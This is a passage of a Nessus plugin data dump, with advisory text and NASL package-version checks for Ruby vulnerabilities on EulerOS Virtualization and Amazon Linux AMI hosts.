(EulerOS-SA-2019-1617)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2016-2339", "CVE-2018-16395", "CVE-2018-16396", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "modified": "2021-07-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:rubygem-bigdecimal", "p-cpe:/a:huawei:euleros:rubygem-io-console", "p-cpe:/a:huawei:euleros:rubygem-json", "p-cpe:/a:huawei:euleros:rubygem-psych", "p-cpe:/a:huawei:euleros:rubygem-rdoc", "p-cpe:/a:huawei:euleros:rubygems", "cpe:/o:huawei:euleros:uvp:3.0.2.0"], "id": "EULEROS_SA-2019-1617.NASL", "href": "https://www.tenable.com/plugins/nessus/125569", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125569);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/06\");\n\n script_cve_id(\n \"CVE-2016-2337\",\n \"CVE-2016-2339\",\n \"CVE-2018-16395\",\n \"CVE-2018-16396\",\n \"CVE-2019-8322\",\n \"CVE-2019-8323\",\n \"CVE-2019-8324\",\n \"CVE-2019-8325\"\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : ruby (EulerOS-SA-2019-1617)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - Ruby is an extensible, interpreted, object-oriented,\n scripting language. It has features to process text\n files and to perform system management tasks.Security\n Fix(es):An issue was discovered in the OpenSSL library\n in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before\n 2.5.2, and 2.6.x before 2.6.0-preview3. When two\n OpenSSL::X509::Name objects are compared using ==,\n depending on the ordering, non-equal objects may return\n true. When the first argument is one character longer\n than the second, or the second argument contains a\n character that is one less than a character in the same\n position of the first argument, the result of == will\n be true. This could be leveraged to create an\n illegitimate certificate that may be accepted as\n legitimate and then used in signing or encryption\n operations.(CVE-2018-16395)An issue was discovered in\n Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before\n 2.5.2, and 2.6.x before 2.6.0-preview3. It does not\n taint strings that result from unpacking tainted\n strings with some formats.(CVE-2018-16396)** RESERVED\n ** This candidate has been reserved by an organization\n or individual that will use it when announcing a new\n security problem. When the candidate has been\n publicized, the details for this candidate will be\n provided.(CVE-2019-8322)** RESERVED ** This candidate\n has been reserved by an organization or individual that\n will use it when announcing a new security problem.\n When the candidate has been publicized, the details for\n this candidate will be provided.(CVE-2019-8323)**\n RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2019-8324)** RESERVED ** This\n candidate has been reserved by an organization or\n individual that will use it when announcing a new\n security problem. When the candidate has been\n publicized, the details for this candidate will be\n provided.(CVE-2019-8325)An exploitable heap overflow\n vulnerability exists in the Fiddle::Function.new\n ''initialize'' function functionality of Ruby. In\n Fiddle::Function.new ''initialize'' heap buffer\n ''arg_types'' allocation is made based on args array\n length. Specially constructed object passed as element\n of args array can increase this array size after\n mentioned allocation and cause heap\n overflow.(CVE-2016-2339)Type confusion exists in\n _cancel_eval Ruby's TclTkIp class method. Attacker\n passing different type of object than String as\n ''retval'' argument can cause arbitrary code\n execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1617\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5681a400\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.648-33.h13\",\n \"ruby-irb-2.0.0.648-33.h13\",\n \"ruby-libs-2.0.0.648-33.h13\",\n \"rubygem-bigdecimal-1.2.0-33.h13\",\n \"rubygem-io-console-0.4.2-33.h13\",\n \"rubygem-json-1.7.7-33.h13\",\n \"rubygem-psych-2.0.0-33.h13\",\n \"rubygem-rdoc-4.0.0-33.h13\",\n \"rubygems-2.0.14.1-33.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-18T14:14:17", "description": "RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900 , which allowed redirection to an arbitrary gem server in any security domain.", "cvss3": {}, "published": "2015-06-18T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ruby20 (ALAS-2015-547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ruby20", "p-cpe:/a:amazon:linux:ruby20-debuginfo", "p-cpe:/a:amazon:linux:ruby20-devel", "p-cpe:/a:amazon:linux:ruby20-doc", "p-cpe:/a:amazon:linux:ruby20-irb", "p-cpe:/a:amazon:linux:ruby20-libs", "p-cpe:/a:amazon:linux:rubygem20-bigdecimal", "p-cpe:/a:amazon:linux:rubygem20-io-console", "p-cpe:/a:amazon:linux:rubygem20-psych", "p-cpe:/a:amazon:linux:rubygems20", "p-cpe:/a:amazon:linux:rubygems20-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-547.NASL", "href": "https://www.tenable.com/plugins/nessus/84248", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-547.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84248);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\");\n script_xref(name:\"ALAS\", value:\"2015-547\");\n\n script_name(english:\"Amazon Linux AMI : ruby20 (ALAS-2015-547)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"RubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not\nvalidate the hostname returned in the SRV record before sending\nrequests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for\nCVE-2015-3900 , which allowed redirection to an arbitrary gem server\nin any security domain.\"\n );\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3dfa3e8c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-547.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby20' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby20-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem20-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems20-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-debuginfo-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-devel-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-doc-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-irb-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby20-libs-2.0.0.645-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-bigdecimal-1.2.0-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-io-console-0.4.2-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem20-psych-2.0.0-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems20-2.0.14-1.27.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems20-devel-2.0.14-1.27.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby20 / ruby20-debuginfo / ruby20-devel / ruby20-doc / ruby20-irb / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:26", "description": "RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900 , which allowed redirection to an arbitrary gem server in any security domain.", "cvss3": {}, "published": "2015-06-18T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ruby22 (ALAS-2015-549)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ruby22", "p-cpe:/a:amazon:linux:ruby22-debuginfo", "p-cpe:/a:amazon:linux:ruby22-devel", "p-cpe:/a:amazon:linux:ruby22-doc", "p-cpe:/a:amazon:linux:ruby22-irb", "p-cpe:/a:amazon:linux:ruby22-libs", "p-cpe:/a:amazon:linux:rubygem22-bigdecimal", "p-cpe:/a:amazon:linux:rubygem22-io-console", "p-cpe:/a:amazon:linux:rubygem22-psych", "p-cpe:/a:amazon:linux:rubygems22", "p-cpe:/a:amazon:linux:rubygems22-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-549.NASL", "href": "https://www.tenable.com/plugins/nessus/84250", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-549.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84250);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\");\n script_xref(name:\"ALAS\", value:\"2015-549\");\n\n script_name(english:\"Amazon Linux AMI : ruby22 (ALAS-2015-549)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"RubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not\nvalidate the hostname returned in the SRV record before sending\nrequests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for\nCVE-2015-3900 , which allowed redirection to an arbitrary gem server\nin any security domain.\"\n );\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3dfa3e8c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-549.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby22' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby22-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem22-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems22-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-debuginfo-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-devel-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-doc-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-irb-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby22-libs-2.2.2-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-bigdecimal-1.2.6-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-io-console-0.4.3-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem22-psych-2.0.8-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-2.4.5-1.6.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems22-devel-2.4.5-1.6.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby22 / ruby22-debuginfo / ruby22-devel / ruby22-doc / ruby22-irb / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:02", "description": "RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900 , which allowed redirection to an arbitrary gem server in any security domain.", "cvss3": {}, "published": "2015-06-18T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : ruby21 (ALAS-2015-548)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ruby21", "p-cpe:/a:amazon:linux:ruby21-debuginfo", "p-cpe:/a:amazon:linux:ruby21-devel", "p-cpe:/a:amazon:linux:ruby21-doc", "p-cpe:/a:amazon:linux:ruby21-irb", "p-cpe:/a:amazon:linux:ruby21-libs", "p-cpe:/a:amazon:linux:rubygem21-bigdecimal", "p-cpe:/a:amazon:linux:rubygem21-io-console", "p-cpe:/a:amazon:linux:rubygem21-psych", "p-cpe:/a:amazon:linux:rubygems21", "p-cpe:/a:amazon:linux:rubygems21-devel", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-548.NASL", "href": "https://www.tenable.com/plugins/nessus/84249", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-548.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84249);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\");\n script_xref(name:\"ALAS\", value:\"2015-548\");\n\n script_name(english:\"Amazon Linux AMI : ruby21 (ALAS-2015-548)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"RubyGems provides the ability of a domain to direct clients to a\nseparate host that is used to fetch gems and make API calls against.\nThis mechanism is implemented via DNS, specificly a SRV record\n_rubygems._tcp under the original requested domain. RubyGems did not\nvalidate the hostname returned in the SRV record before sending\nrequests to it. (CVE-2015-3900)\n\nAs discussed upstream, CVE-2015-4020 is due to an incomplete fix for\nCVE-2015-3900 , which allowed redirection to an arbitrary gem server\nin any security domain.\"\n );\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3dfa3e8c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-548.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby21' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby21-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem21-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems21-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-debuginfo-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-devel-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-doc-2.1.6-1.17.amzn1\")) flag++;\nif 